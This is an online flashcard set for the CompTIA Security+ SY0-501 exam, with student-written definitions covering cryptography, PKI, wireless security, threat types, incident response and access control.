SY0-501 1 - 6

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

Common use cases (for cryptography) (9)

- Low power devices - Low latency - High resiliency - Supporting confidentiality - Supporting integrity - Supporting obfuscation - Supporting authentication - Supporting non-repudiation - Resource vs. security constraints

Hashing algorithms (4)

- MD5 - SHA - HMAC - RIPEMD

Geographic considerations (5)

- Off-site backups - Distance - Location selection - Legal implications - Data sovereignty

PKI Concepts (6)

- Online vs. offline CA - Stapling - Pinning - Trust model - Key escrow - Certificate chaining

Data roles examples

- Owner - Steward/custodian - Privacy officer

Certificate-based authentication (4)

- PIV/CAC/smart card - IEEE 802.1X

wireless security Methods (5)

- PSK vs. Enterprise vs. Open - WPS - Captive portals

Testing Risk Assessment (2)

- Penetration testing authorization - Vulnerability testing authorization

Incident response process (6)

- Preparation - Identification - Containment - Eradication - Recovery - Lessons learned

Asymmetric Algorithms (8)

- RSA - DSA - Diffie-Hellman - Groups - DHE - ECDHE - Elliptic curve - PGP/GPG

Types of actors (6)

- Script kiddies - Hacktivist - Organized crime - Nation states/APT - Insiders - Competitors

General security policies (2)

- Social media networks/applications - Personal email

Multifactor authentication examples (5)

- Something you are. - Something you have. - Something you know. - Somewhere you are. - Something you do

Things Cryptography supports

- Supporting confidentiality - Supporting integrity - Supporting obfuscation - Supporting authentication - Supporting non-repudiation

Account types (5)

- User account - Shared and generic accounts/credentials - Guest accounts - Service accounts - Privileged accounts

Wireless Cryptographic protocols (4)

- WPA - WPA2 - CCMP - TKIP

Types of certificates (10)

- Wildcard - SAN - Code signing - Self-signed - Machine/computer - Email - User - Root - Domain validation - Extended validation

cryptography algorithms for Obfuscation (3)

- XOR - ROT13 - Substitution ciphers

which format is used to transfer public keys on Windows?

.cer file format (transfers which key)

PKCS #12 file name

.p12 file

PKCS #7 file name

.p7b file

which format is used to transfer private keys on Windows?

.pfx file format (transfers which key)

Symmetric encryption Key strength

128 bit and larger

AES

128-bit block cipher. 128-, 192-, and 256-bit keys

Twofish

128-bit block size, key sizes up to 256. no patent, is in the public domain

SHA-1 (2)

160-bit digest. Retired for most US Gov use

MD5 concerns (2)

1996 Collisions found. 2008 Researchers created CA certificates that appeared to be legit when MD5 is checked.

NFC

2 way close wireless communication

AP band selection and bandwidths: 2.4 GHz

2.4 GHz not over lapping channels 1,6,11. 20MHz throughput

SHA-1 concerns

2005 collisions found.

Asymmetric encryption Key strength

3,072 bits and larger

Problem with DES (2)

56 bit keys, easy to brute force with today's tech

Blowfish (4)

64-bit block cipher, variable length key (32 to 448 bits). No known way to break the full 16 rounds of encryption. not limited by patents.

ALE example

7 laptops stolen a year (ARO) x $1000 (SLE/asset value) = $7,000 (example of)

Staging Environment

A "production like" environment to run performance tests and test usability and features.

USB blocking (2)

A DLP on a workstation that blocks use of USB. prevents exfiltrating of data and downloading of malicious data off of USB

permanent (persistent) agent (3)

A NAC agent that is installed on a client. It checks the client for health. Periodic updates may be required

RAT (e.g)

A Trojan horse that sets up a backdoor to allow many other malware to install e.g. keyloggers, screenshots/videos, copy files.

Exploitation frameworks

A basic framework that already has built-in mechanisms to deliver a payload and have it execute. All it requires is the exact code to insert to complete the exploit.

Diffie-Hellman key creation process (3)

A combines A's private key with B's available public key. B combines B's private key with A's available public key. the two created keys are identical symmetric keys.

Diffie-Hellman (2)

A key exchange asymmetric algorithm that transfers symmetric keys over insecure channels. Does not itself encrypt or authenticate.

Authentication issues (3)

A lapse in any part of the authentication process can open the entire network: weak passwords, not enough authentication factors. may allow wrong people access and right people blocked. MFA also means more chances for problems

What environments are WAFs often used?

A major focus of Payment Card Industry Data Security Standard (PCI DSS)

(Digital certificate) Serial Number

A number uniquely identifying the certificate within the domain of its CA

Metasploit

A penetration-testing tool with thousands of known exploits that can be used together to test a system

Whaling

A phishing attack that targets high-profile targets like CEO.

Nonce

A random or pseudo-random number that is used once in a cryptographic communication.

replay attack

A replay of information captured over the network to make the bad guys seem like the original users.

Out-of-band response

A response sent by IPS set for passive monitoring that is outside of the traffic flow to stop the transfer of malicious traffic

ROT13

A substitution cipher that rotates characters 13 places.

Layer 3 switches (2)

A switch and a router in same device. Switch port set to run on layer 2 and router ports on layer 3

Aggregation switches

A switch that provides connectivity for several other switches and the core of the network.

Program virus

A virus attached to or associated with an application

Thick AP

AP that handles most of the wireless tasks while switch has no control or management of the functions of the AP

Thin AP

AP that is less intelligent and expensive and is centrally managed from the switch its connected to.

ALE

ARO x SLE

Man-in-the-Middle

ARP poisoning by sending users ARP requests to update their ARP tables to send data to the bad guy who forwards it to the router.

Authorization

Access someone has based on their identification and authentication.

Round robin and affinity are referred to this type of load balancing

Active/active load balancing

AES history of implementation

Added to FIPS in 2001. took 5 years to standardize this replacement for DES

GPS tagging (Geo tagging) (ie)

Adds location to document metadata. i.e. adds GPS coordinates to taken photos and videos, etc

Rule Based Access Control (RBAC)

Administrator creates ACLs for objects and system enforces the rules.

Best choice for removing Malware from a system if no backup option

Advanced malware tools

Benefits of SDN (4)

Agile: changes can be made very quickly and rolled out automatically. managed centrally. orchestration. Open standard (vendor neutral)

ISA

Agreement used by the US Federal Government to define security controls.

Ad Hoc examples (2)

AirDrop. contact sharing apps

types of wireless crackers (2)

Aircrack-ng Suite, Fern

Bluesnarfing (2)

Allowed attackers to take files from Bluetooth-enabled devices especially if they knew the name of the file. Patched in 2003

IPSec (Internet Protocol Security)

Allows layer 3 encryption, authentication, confidentiality, and integrity/anti-replay between sites

watering hole attack (2, ie)

An attack method that infects sites that a group is likely to trust and visit. could be websites or local coffee shops, etc. Tends to infect all visitors while waiting for specific ones.

Zero-day attack

An attack that exploits a vulnerability that has not been detected or published.

archive bit

An attribute of a file that shows whether the file has been backed up since the last change.

EAP (2)

An authentication framework. WPA and WPA2 use five types as authentication mechanisms.

BCRYPT is an extension of which library?

An extension of the UNIX crypt library.

Rainbow tables (2)

An optimized, pre-built set of hashes that can be searched to match hashes in seconds if that password is on that table. Need different tables for different hash methods.

ways to configure full device encryption (2)

Android: strong/ stronger/ strongest. apple iOS has similar functionalities

Baseline Deviation (3)

Any changes to the norm: identify and send alerts immediately. Document everything well. Posture assessment can be done on VPN and disallow access if mismatches

central app clearinghouses (3)

Apple App store. Google Play. Microsoft Store

Multipurpose proxies (3 eg)

Application proxies that understand how to proxy many applications: HTTP, HTTPS, FTP, etc

Logs and events anomalies

As you build extensive logs on a SIEM from many different sources and begin correlating all the data, you can start extensive analyzing and spotting logs and events that deviate from the norm more easily.

Web Incident Category

Attack executed from a website or web-based application

Improper usage Incident Category

Attack resulting from a violation of AUP

Personnel issues: Insider threats (and concern)

Authenticated users have more free reign: not as much security inside. bigger problem if rights and permission greater then necessary

use a salt and password to create a hash is an example of what cryptography use case?

Authentication (Common use cases example)

Something you do

Authentication factor based on someone's personal way of doing things.

Secure token (2)

Authentication mechanism that is added to clients when they authenticate. it is provided with each request to the server where its validated.

Principles of social engineering (7)

Authority, Intimidation, Consensus, Scarcity, Familiarity, Trust, Urgency

Examples of Security Automation (4)

Automate: Functional security tests. test against known vulnerabilities. Penetration testing. Test application with unexpected input.

Automation/scripting (3)

Automated courses of action. Continuous monitoring. Configuration validation

FDE (3)

Automatically encrypts entire Drive: data and OS. requires a password to access. often built-in to OS

GPG is available for what OS?

Available for: Linux, Windows, MAC OS, Many others

full backup

Backup that copies all files from a system.

(Backup) Distance (2)

Balancing act between recovery (scale of disaster) and accessibility (travel for staff). unique requirements e.g. specialized printers, bandwidth availability

Accidental/"friendly" DoS (3 eg)

Bandwidth Overload ie gigabyte download over DSL. Layer 2 loop without STP. building breaks ie waterlines

Downloadable Exploitation frameworks (3)

BeEF - The Browser Exploitation Framework Project. RouterSploit: Router Exploitation Framework. Metasploit: Build your own vulnerability tests or use modules in existing exploit databases.

Fighting WPS

Best practice to not use it. too many vulnerabilities

False negative best practice

Best to update latest signatures before scans.

CCMP (3)

Block cipher mode. uses 128-bit keys and 128-bit block sizes.

BYOD aka

Bring your own technology

On-boarding

Bringing in new hires or transfers into the organization.

Identification of an incident: incident indicators (4)

Buffer overflows attempts identified by IPS/IDS Malware identified by antivirus. Configuration change detected by host-based monitor. Network traffic deviates from norm.

Risk Transfer (2)

Buy insurance. mitigate risk to a third party

How does segmentation improve performance?

By segmenting high-performance application onto their own network will ensure the highest efficiency possible.

Private CA (2)

CA built in-house of medium-to-large organization. All network devices must be configured to trust the internal CA

Offline CA

CA that are taken offline, usually the root CA.

Reporting requirements/escalation Corporate / Organization contact examples

CIO. Head of Information Security. Internal response teams.

Industry-specific frameworks (2)

COBIT. ITIL

CYOD

COPE device that a user choses from options provided by the company.

Substitution Cipher example

Caesar Cipher (example of)

'CALL get_options'

Call command with name of stored procedure

network-based firewall can act as what other devices?

Can act as a VPN concentrators, Proxy, and router

How to create your own digital certificates. (#?)

Can be built into OS, e.g Part of Windows Domain services. 3-party options for Linux.

Weak security configurations (3)

Can be easily cracked. Give a false sense of security. Outdated, easy to decrypt or has known vulnerabilities

Cost of MFA (3 eg)

Can be expensive e.g. separate hardware tokens, specialized scanning equipment. or cheap e.g. free smartphone applications

Push notification services management

Can be managed locally or from MDM

Email encryption on Mail Gateways (4)

Can check email encryption on gateways since encryption is not always automatic. based on policy, check that policy applies to encrypt data for particular emails. force the encryption, send a password to the sender. or a text to recipient. emails that already have encryption process can be sent normally

Security concerns with Media gateway (3)

Can disable all voice communications, DoS. Make outbound calls: spam, malicious services. Listen to voice communication: Corporate espionage

What OS can Access violations occur in?

Can occur in any including some as simple as a credit card terminal

Special purpose embedded devices: Vehicles security concerns (2, e.g)

Can remotely monitor whats happening within that car. Can control internal electronics e.g. disable engine

Non-persistence: live boot media (2)

Can run OS and application instances from portable media. Moves the OS and application instances from place to place.

what happens next if everything works in test environment?

Can stage all that code and prepare it for production.

what can Protocol analyzers do with data?

Can store data over long periods and use analytics to see what happened to that data during that time frame.

How are IPS tested for effectiveness?

Can test catch/miss rates of false negatives with industry tests

Remote attestation (3)

uses centralized server to inventory the hardware and software on remote devices. It digitally signs and encrypts the results of that inventory with the TPM in that device. Before devices boot changes are identified based on previous inventory.

Elliptic curve (3)

uses curves and more smaller numbers than asymmetric encryption. smaller storage and transmission requirements. perfect for mobile devices.

ECC (2)

uses curves instead of large numbers. smaller keys.

What communication can be sent over SATCOM?

uses digital communication: voice and data

Infrastructure as a Service

uses hardware available in the cloud to run your own software.

Pulping (2 def)

uses large tank to remove ink off of paper to create recycled paper. reduces shredded paper to mash or puree (which may be a raw material to make paper)

Attribute-based access control (ABAC)

uses many different criteria to determine what kind of access a user may have.

Perfect forward secrecy

uses of temporary keys like Elliptic curve or Diffie-Hellman ephemeral for every session.

Email certificates (2)

uses recipient's public key to encrypt contents of emails. use own private key for digital signature on an email.

How IPS act as Application-aware security devices

uses subset of signatures for application specific vulnerabilities, less false positives

Key exchange

using asymmetric encryption to transfer symmetric keys.

Non-persistence: Revert to a known state

using snapshots to revert to previous configurations if current ones have problems.

Non-persistence: Rollback to a known good configuration

using snapshots to revert to previous configurations while keeping current data.

which Validation Point is fastest for checking data and why?

usually Client-side validation instead of server-side since it takes place on user's computer.

Onboarding (security procedures)

usually a formal process involving an induction or training process for the security of their role.

Social media security policies (3)

usually an extension of the code of conduct. balances the company requirements towards its use with allowing employees to take advantage of it. confidential information can only be shared by a company spokesperson for public comments.

Remote access VPN

usually built-in software to a remote device to communicate to VPN Concentrators

Reason for different time offsets (4)

usually determined by time zone settings on local devices. different file systems store timestamps differently: FAT stores time in local time. NTFS stores time in GMT

APT

usually done by government where they spent massive resources on constant attacks.

vulnerability scanning (4)

usually minimally invasive while gathering as much info on a system as possible without performing any exploits. Port scan to see open services and their versions. identify systems and security devices. test inside and outside of a system.

Certificate issues (4)

usually result when best practices not followed: have certificate signed by some one trusted. update certificates regularly. Applications must perform proper certificate checks. missing checks could allow MitM attacks to occur

Proper input validation

validate and check what is expected in that input field.

Configuration Validation (2)

validate configuration to e.g. application instance before going live and after by constantly using automated checks. comparing system configurations to a configuration file

Authentication

verifies the source of the data

How to verify unencrypted credentials?

verify with a packet capture, checks if data is readable and in the clear.

PEM (2)

very common format provided by CAs. ASCII format, letters and numbers, making it easy to transfer and email.

symmetric algorithm advantages

very fast to use and less overhead

Discretionary Access Control (DAC) security and concerns

very flexible. but very weak security since it relies on owner to set proper security

confidential data

very sensitive data that must be approved to view. (often PII)

IPSec standardization

very standardized: different manufacturer firewalls can be used on each side

dynamic analysis concerns

very time and processor resource heavy

virtualization on the enterprise-level

virtualization itself is the OS that other OS run on top of.

Host-based virtualization

virtualization on normal desktops

Script virus

virus that runs as a script in the OS or browser. Often attached to emails

Vulnerabilities due to Lack of vendor support (3)

vulnerabilities due to when vendors aren't diligent in their search for vulnerabilities and the providing of patches. This is an issue when the vendor has access to the code and isn't aware of the problem or care about fixing it. Big concern in IoT devices.

New threats/zero day

vulnerabilities that are newly discovered and not yet addressed by a patch.

non-credentialed scan

vulnerability scan from the outside with no access or authentications

(Vulnerability scan results) Identify Lack of security controls (3)

vulnerability scan results will inform if: No firewall. No anti-virus. no anti-spyware.

(Vulnerability scan results) identify Common Misconfigurations (2)

vulnerability scan results will inform if: Open shares. Guest access.

Identification of an incident: precursors (3)

vulnerability scan web server logs. Exploit announcements. Direct threats.

SAML disadvantage

was never designed for mobile apps.

DAP replacement

was replaced by a more lightweight LDAP that uses TCP/IP

Passive (security) tools

watch packets as traffic goes by and gives info on what may be happening inside of the traffic or on the client or server.

DLP

way to monitor traffic and stop loss of sensitive data

reason PAP has no encryption

we didn't require it on analog dial-up lines since there was no mechanism to grab that data.

Example of weak implementations (3)

weak encryptions. WEP - RC4 key can be recovered with enough packets. DES- small 56 bit keys.

UTM aka

web security gateways

Certificate chaining security and concerns

web server needs to be configured with the proper chain certificates or end user may receive an error.

Identification of critical systems

what computing systems, or IT services are required for these mission-essential business functions?

what does the log of the host-based firewall show?

what traffic was allowed or blocked

Collision

when 2 different plaintext come up with the same hash.

When is Remote wipe used? (2)

when a device is stolen. when someone leaves organization

End-of-life vulnerability

when a device or software is no longer in support from the vendor that stops security patches

False negative

when a vulnerability exists but the scan did not detect it.

dead code

when an application runs an executable, makes calculations to form these results which are not used anywhere else in the application.

Diffusion

when one character is changed of plaintext input, many characters changes in the ciphertext output.

Pinning

when the server's certificate or public key is hard-coded into the application. Application compares the certificate on the server to the hard-code one.

Misconfiguration/weak configuration

when there's a weak link or an open door somewhere in the system setup that some one on the outside can easily gain access to.

Proper error handling

when writing applications making sure error messages doesn't display more information then necessary.

Buffer overflow (3)

when written memory spills past its set allocated space and into other memory. May allow more access to system. Often it can cause crashes.

Buffer overflow (3)

when written memory spills past its set allocated space. It takes time to find one that is controllable and repeatable. Often it can cause crashes.

identification (2)

who some one claims to be. usually username.

the scope of a Tabletop exercise (4)

who to invite: internal discussion or local first responders and 3rd party. how big the disaster is. can give no details until exercise begins. can set limits on what information is available for the drill.

example of a everyday Faraday cage

window of microwave oven.

Jamming

wireless RF DoS that decreases the signal to noise ratio at the receiving device to the point where it can't hear the good signal.

WPA (3)

wireless encryption protocol that uses RC4 ciphers with TKIP. Used a larger IV. Every packet gets a unique 128-bit encryption key

wireless scanners/crackers (4)

wireless monitoring tools can capture packets across the network. (can try wireless attacks to see if AP susceptible to deauthentication attacks, rouge AP, etc.) wireless tools that find wireless network passwords/keys, find a WEP key, brute force a WPA/WPA2

Which replay attacks are easier to capture?

wireless replay attacks are more easier then wired

ANT/ANT+

wireless sensor network protocol that uses the 2.4 GHz ISM band

ANT/ANT+ security concerns (3)

wireless so same concerns: jamming. optional encryption so replay

XOR advantages

with a truly random key, the obfuscation results are theoretically unbreakable.

How Host-based firewall act as Application-aware security devices

work with OS to determine applications

Principles of social engineering: Urgency (2)

works alongside scarcity. Tries to make you act quickly without thinking

LDAP Standard was written by

written by the International Telecommunications Union (ITU)

Linux OS Update options (4)

yum apt-get rpm graphical front-ends

types of controls (8)

• Deterrent • Preventive • Detective • Corrective • Compensating • Technical • Administrative • Physical

Spam filter on a Mail Gateway (5)

Can white list emails from trusted senders. SMTP standards check: block anything that doesn't follow RFC standards. Perform rDNS on the sender's domain name to check that the email in the DNS server matches the sender's email. Tarpitting: intentionally slow down server conversations to make spammers give up. Recipient filtering-Block all inbound email not addressed to a valid recipient email address

Session Hijacking

Capturing session IDs or accessing cookies where the IDs are stored to gain access to the User's account.

Proximity Cards (3)

Cards to gain access to door locks or doors by moving card close to reader. Card is powered from the reader. Often used as an identifier that is compared to a larger database stored elsewhere

keyCertSign (5.)

Certificate standard extension used by a CA for certificate signing

keyAgreement (4.)

Certificate standard extension used for Diffie-Hellman key agreement

keyEncipherment (2.)

Certificate standard extension used for key exchange

dataEncipherment (3.)

Certificate standard extension used to make data confidential

cRLSign (6.)

Certificate standard extension used to sign a Certificate Revocation List

encipherOnly (7) decipherOnly (8)

Certificate standard extension used with the Diffie-Hellman key agreement

Fighting logic bombs (3)

Change control. Alert on changes like HIDS, Tripwire, etc. Constant auditing

OS secure configurations (secure configuration guides) (4)

Check and secure: Updates. User Accounts. Network access. Ongoing Monitoring and anti-virus and anti-malware

Fighting phishing (3)

Check for errors in the URLs, graphics, fonts, spelling. Don't give personal info over the phone. Don't click links to emails. go directly to the site yourself.

weak cipher suites (2 eg)

Ciphers that are easy to break and should be avoided. less than 128 bit keys. outdated hashes like MD5 with known collisions

LWAPP (2)

Cisco proprietary standard protocol that Wireless LAN controllers use to communicate with WAPs. allows to manage multiple AP simultaneously

PEAP created by (3)

Cisco, Microsoft, RSA Security

cloak & dagger (2)

Clickjacking on phones Android OS up to v 7.1.2. Invisible layer used to monitor keystrokes and record user input

Public cloud deployment model

Cloud available to everyone over the internet

Platform as a service (3)

Cloud handles servers, software, maintenance, and platform, and user handles development to get the software running. Building blocks are provided for development.

TKIP (3)

Combines a secret root key with the IV. adds a sequence counter to prevent replay attacks. implements a 64-bit Message Integrity Check.

DevOps (3)

Combines development, Operations and QA into one team. Emphasis on automation and monitoring. shrink deployment cycles.

Common Criteria for Information Technology Security Evaluation aka

Common Criteria (or CC)

X.500 Attribute CN

Common Name. identifies the person or object

Where are Evil twins commonly found

Common in location not using 802.1X like hotels and coffee shops

Where secure tokens is used

Commonly used in federations, can be provided by 3rd party.

Logic Bomb (4)

Computer code that lies dormant until it is triggered by a predefined event. usually causes massive damage. Time bombs wait for a date or time. Antivirus can't detect it.

Places DLP implemented (3)

Computer-Endpoint DLP, Data in use. On Network- Data in motion. On server- Data at rest

Secure Ad Hoc Topology (4)

Configure these settings through MDM: allow/disable this feature. allowed with right credentials. limited to certain apps

Flood guard (3)

Configures a maximum number of source MAC addresses on an interface to prevent a DoS with MAC addresses. Maintains a list of every source MAC address Once maximum is exceeded port security activates which is usually to disable the port by default, can filter instead

the data looking different after going through a PGP key is an example of what?

Confusion (example)

USB OTG (2)

Connect multiple mobile devices directly together. Mobile device acts as both a host and storage device.

TPM Persistent memory

Contains hard-coded keys inside the hardware that were burned in during production.

COBIT stands for

Control Objectives for Information and Related Technology

Media gateway (2 e.g.)

Converts between PSTN and VoIP. e.g. ISDN to Ethernet with VoIP, SIP to H.323, etc

Which deployment model offers the most security?

Corporate-owned deployment model

URL hijacking examples

Could be typos, brandjacking, different top-level domains (.org/.com)

X.500 Attribute C

Country. The country's 2-character ISO code (such as c=US or c=GB)

AH

Created by combining the IP header and data with a hash: MD5, SHA-1, SHA-2 provides authentication and integrity Original Packet: IP Header/Data Mode: New IP Header/AH Header/IP Header/Data

X.500 Attribute usual order from root to Leaf object (7)

DC, C, ST, L, O, OU, CN

Secure version of DHCP

DHCP has no built-in security

Email DLP (3)

DLP between emails using local appliance or cloud-based, inbound or outbound Inbound: blocks keywords, identifies forgeries, quarantines email messages Outbound: stops fake wire transfers, W-2 transmissions, employee information, social security, etc

Cloud-based DLP (3)

DLP between the users and the internet: block custom defined strings. Manages access to URLs. blocks viruses and malware

Zones/topologies (8)

DMZ. Extranet. Intranet. Wireless. Guest. Honeynets. NAT. Ad hoc

secure protocol(s) for Domain Name Resolution

DNSSEC

Who is responsible for signing off on the compliance of data?

Data owner (responsible for)

(Backup) Location Selection: data sovereignty (1, 2 eg, 1)

Data that resides in another country is subject to its laws, e.g. Legal monitoring and court orders compliance laws may prohibit the moving of data out of the country.

Data-in-transit aka

Data-in-motion (aka)

(Digital certificate) Valid From / Valid To

Date and time during which the certificate is valid.

Standard operating procedure examples (3)

Day-to-day processes and procedures for: New user account creation. Backup data storage requirements. Encryption key requests

AKA layered security

Defense-in-depth (aka)

fighting watering hole attacks (ie)

Defense-in-depth. Have as many security methods layered on top of one another as possible. Updated antivirus, IDS, firewalls, etc

Darik's boot and Nuke (DBAN)

Deletes for good everything on an entire hard drive

Mircosoft SDelete

Deletes for good everything on individual files or folders

DES creation

Developed between 1972 and 1977 by IBM for the NSA

Fighting Buffer overflows

Developers need to perform bounds checking to confirm information fits perfectly into the space that's been allocated.

DDoS mitigator (4)

Device that can resist a DDoS attack or minimize the impact. Cloud-based - internet provider or reverse proxy service. On-site tools - DDoS filtering in a firewall or IPS. Positioned between user and the internet.

SSL/TLS decryptor (2)

Device that sits between 3rd party and user, decrypts data, checks for anything malicious and re-encrypt it. Decryption is allowed based on certificate trust with the site

Application-aware security devices (3)

Devices that can identify traffic based on an application: Network-based Firewalls IPS Host-based firewall

Misconfigured devices (3)

Devices that: Default username and password. Outdated software with known vulnerabilities. running debug or maintenance code which provides additional information to users than normally available

What do routers connect? (2)

Different subnets. Different network types: LAN,WAN, copper, fiber

Mobile Device Hotspot/tethering security

Disable on MDM to prevent a device from becoming a rouge AP.

Pixie Dust

Discovered in 2014. poorly encrypted WPS PIN can be received and brute forced offline in less then 30 min

Access control found in most OS

Discretionary Access Control (DAC)

Special purpose embedded devices: Aircraft/UAV security concerns

DoS could damage the aircraft and others on the ground.

Business Impact Analysis (4)

Document the critical business functions. Impact of their loss. How long it will be impacted. Calculate if disaster recovery is a good investment

Incident analysis resources examples (4)

Documentation, network diagrams, baselines, critical file hash values

Do stateless firewalls keep track of sessions?

Doesn't keep track of sessions

Mesh trust model concerns

Doesn't scale well.

X.500 Attribute DC

Domain Component. Components of the object's domain e.g. DC= com

dig stands for?

Domain Information Groper.

fighting hoaxes (3)

Don't believe anything on the internet Verify, Check the source, hoax-slayer.net, snopes.com Spam filters

Fighting Trojans (3)

Don't run unknown software. Antivirus that have its signature can stop it even if the user tries to run it. Keep and restore from backup

MS-CHAP best practice

Don't use it. Better to use L2TP, IPsec or some other VPN technology

FDE security

Drive stays encrypted even if lost or moved to another computer.

Driver behind RADIUS Federation. (2)

Driven by eduroam (education roaming) Educators can use their normal authentication when visiting a different campus.

Driver Manipulation (2)

Drivers are privileged code trusted by the OS so it a convenient place to embed malicious software. Could be used to monitor video, keyboard, mouse

Original XSS

Due to early browser security flaws, information could be shared between sites if both of those sites were open as windows in your browser.

when archive bit clears and doesn't

During full and incremental backups. doesn't clear for differential

EMI/EMP concerns (2)

EMI leakage. injecting signals into EMI

Round robin scheduling (1 eg, 2 types)

Each server is selected in turn e.g. 1st set of traffic goes to server a, 2nd to server B etc. weighed-prioritize certain servers to receive more load. dynamic-monitor server load and distribute to the server with the lowest use

advantage of Hierarchical CA

Easier to deal with the revocation of an intermediate CA than a root CA.

ESI stands for?

Electronically Stored Information

Personal issues: Personal emails (2)

Emails sent from work imply endorsement by the organization. use company resources, may attach sensitive info

Type I hypervisor aka (2)

Embedded hypervisor. Native hypervisor.

BYOD (2)

Employee uses their own device for personal and corporate use simultaneously. Needs to meet company's requirements. e.g. same OS

Fighting Evil Twins (2)

Encrypt communications. HTTPS/VPN

WiFi mobile security

Encrypt data to fight data capture and MITM

Secure coding techniques: encryption

Encrypt source code, data in motion and data at rest.

confidentiality

Encrypted data

Fighting session hijacking (2)

Encryption end to end: Firefox extension: Force-TLS, Encryption part way: local wireless encrypted. VPN (OpenVPN, VyprVPN)

ECB

Encryption mode that encrypts each block with the same key and block cipher encryption.

Privacy impact assessment (3)

Ensure compliance with privacy laws and regulations. What PII is collected and why. How the PII data will be collected, used, and secured.

Production environment

Environment where application is made live and rolled out to the user community.

Rack monitoring (3)

Environmental sensors. Webcams or security cams. Integrated with Enterprise monitoring systems that can detect temperature changes and motion.

EAL stands for?

Evaluation Assurance Level

collision security

Every plaintext should have a different hash associated with it

Hot site (4)

Exact replica of production system. Buy two of everything. applications and software are constantly replicated and updated. Flip a switch and can move entire production environment here.

Pwn2Own competition example of what?

Example of VM escape protection presented as a hacking competition to find vulnerabilities for some prizes.

Documented incident categories examples from the Computer Incident Handling Guide (6)

External/removable media. Attrition. (e.g. brute-force attacks) Web. Email. Improper usage. Loss or Theft of equipment

SDE (2)

FDE built-in to the circuitry of these drives. Doesn't require FDE OS software.

Hardware/firmware security (10)

FDE/SED. TPM. HSM. UEFI/BIOS. Secure boot and attestation. Supply chain. Hardware root of trust. EMI/EMP

SHA a part of

FIPS (hash standard)

secure protocol(s) for file transfers

FTPS SFTP

DEP (2)

Feature where OS works with CPU to allocate a section of memory for executables. Prevents Malware from executing in non-executable areas.

DES is part of

Federal Information Processing Standards (FIPS)

VM escape protection

Find and patch vulnerabilities to escape VMs.

What other devices can act as Site-to-Site VPN?

Firewalls

How to fight worms (2)

Firewalls and IPS/IDS can mitigate types with well-known signatures. Once they are inside they spread quickly and are hard to stop.

Defense in depth examples (9)

Firewalls. DMZ. Hashing and salting passwords. Authentication. IPS. VPN access. Card/badge access. Anti-virus and anti-malware. security guard

Camera properties (3)

Focal length-shorter is wider angle. Depth of field- see sharp images across large distances. Infrared-see in dark.

High resiliency (for cryptography)

For concerns of integrity use: Larger key sizes. Strong encryption. Hashing to check data integrity.

examples of input methods that should be checked for proper input validation (3)

Forms. command line. fields

Types of proxies (6)

Forward and reverse. Transparent and explicit. Application/multipurpose

ITIL

Framework that breaks down the IT life cycle: Service Strategy, Service Design, Service Transition, Service Operation, Continual Service Improvement

COBIT

Framework that focuses on regulatory compliance, risk management and aligning IT strategy with organizational goals.

Order of volatility (7)

From Most to least: 1. CPU registers, CPU cache. 2. Router table, ARP cache, process table, kernel statistics, memory. 3. Temporary file systems,~pagefile. 4. Disk. 5. Remote logging and monitoring data. 6. Physical configuration, network topology. 7. Archival media

backup/ restore times

Full High /Low Incremental Low/High Differential Moderate/moderate

location-based policies, location finding examples (3)

GPS- very accurate location on mobile devices. 802.11 wireless gives a regional view. IP address is not very accurate since it can give outside of country location.

ways to Domain hijacking (3)

Gain access by brute force, social engineering the owner or domain registrar, gain access to email that manages account, etc.

Domain hijacking

Gain access to the Domain registration usually to change domain information to a domain DNS controlled by the bad guys.

Privilege Escalation (4)

Gives higher-level access to a system then allowed. often due to a bug or vulnerability. commonly administrative so should be resolved quickly. access could be horizontal

Payment systems NFC is used in (3)

Google wallet. MasterCard partnership. Apple Pay

RFC 3227 (2)

Guidelines for Evidence Collection and Archiving. provides best practices for forensic data collection

What is referred to as an endpoint security agent?

HIDS/HIPS (referred to)

HMAC examples (2)

HMAC-MD5. HMAC-SHA1

Process of Hot and cold aisles

HVAC systems at the end of each isle. Cool air sent through the floor and up to the cold aisle. cool air pulled through the server racks and to the back of the servers and the hot aisle. Hot air rises up and recirculates into the HVAC.

RC4 concerns (3)

Had a "biased output": If the 3rd byte of the origonal state is zero and the second byte is not equal to two, then the second output byte is always zero.

What chemical used to be used for fire suppression but no longer and why?

Halon. No longer manufactured since it destroys the ozone.

Technical Controls (3 eg)

Hardware and software to keep things secure: Firewalls, AD authentication, disk encryption, etc

Few things that should be well documented to create a baseline (4)

Hardware, software, network traffic patterns, data storage

Reporting requirements/escalation (2)

Have a contact list ready for different incidents. Could be within organization, internal non-IT or external.

VM sprawl avoidance (2)

Have a formal process and document everything as you provision new systems. perform audits to determine if VMs need to be deprovisioned

Fighting Birthday attacks

Have larger hash output sizes to avoid collisions.

PHI

Health information associated with an individual

PHI examples (3)

Health status, health care records, payments for health care (example of which Data sensitivity labeling)

Lighting security (3)

Helps see everything on camera for non IR cameras. Light angles may be important for facial recognition. Avoid shadows and glare.

Hardware Security Module (3)

High-end cryptographic hardware used in large environments often to manage clusters of servers and many keys to protect. Can be a plug-in card to a proxy or firewall. secure key backup. can be an SSL accelerator

Implementations of Air gaps (2, 2 eg)

Highly secure networks. Industrial systems, e.g. SCADA, manufacturing

Preservation (3)

Holding on to forensic data for: current investigation. future investigations to view correlations. when new items of interest are discovered.

Remote access VPN aka

Host-to-Site VPNs (aka)

Load balancer scheduling and types

How load is scheduled to go behind a load balancer: Affinity. Round robin.

Reporting requirements/escalation: Internal non-IT contact examples

Human resources. Public affairs. Legal department

Switch port security (3)

IEEE 802.1X -Port-based Network Access Control (NAC) which doesn't allow access until user authenticates. Administratively disable your unused ports. Enable duplicate MAC address checking, stop spoofing

Spanning Tree Protocol standard

IEEE standard 802.1D

IPsec AH ESP Transport mode

IP Header/AH Header/ESP Header/Data/ESP Trailer/Integrity Check Value

Somewhere you are examples (2)

IP address. geolocation

Examples of changes done to Master Image before deploying (3)

IP addresses. firewall rules. licensing updates

Corrective examples (3)

IPS can block attacker. backups can mitigate a ransomware infection. a backup site can provide options during a storm (control example)

Anomaly-based

IPS/IDS creates a baseline for normal traffic flow and identifies malicious traffic based on what doesn't match the normal flow

Heuristics

IPS/IDS identifies traffic based on certain characteristics. Uses artificial intelligence.

Inline monitoring

IPS/IDS sits inline with all traffic passing through it before being allowed or denied

AAA framework (4)

Identification, Authentication, Authorization, and Accounting

Spanning Tree Protocol (2)

Identifies and prevents loops on switched networks by using blocked ports. Also prevents downtime by changing bridge configuration when a path is down.

Transitive Trust

If Domain A trusts Domain B, Domain B trusts Domain C, then Domain A trusts Domain C.

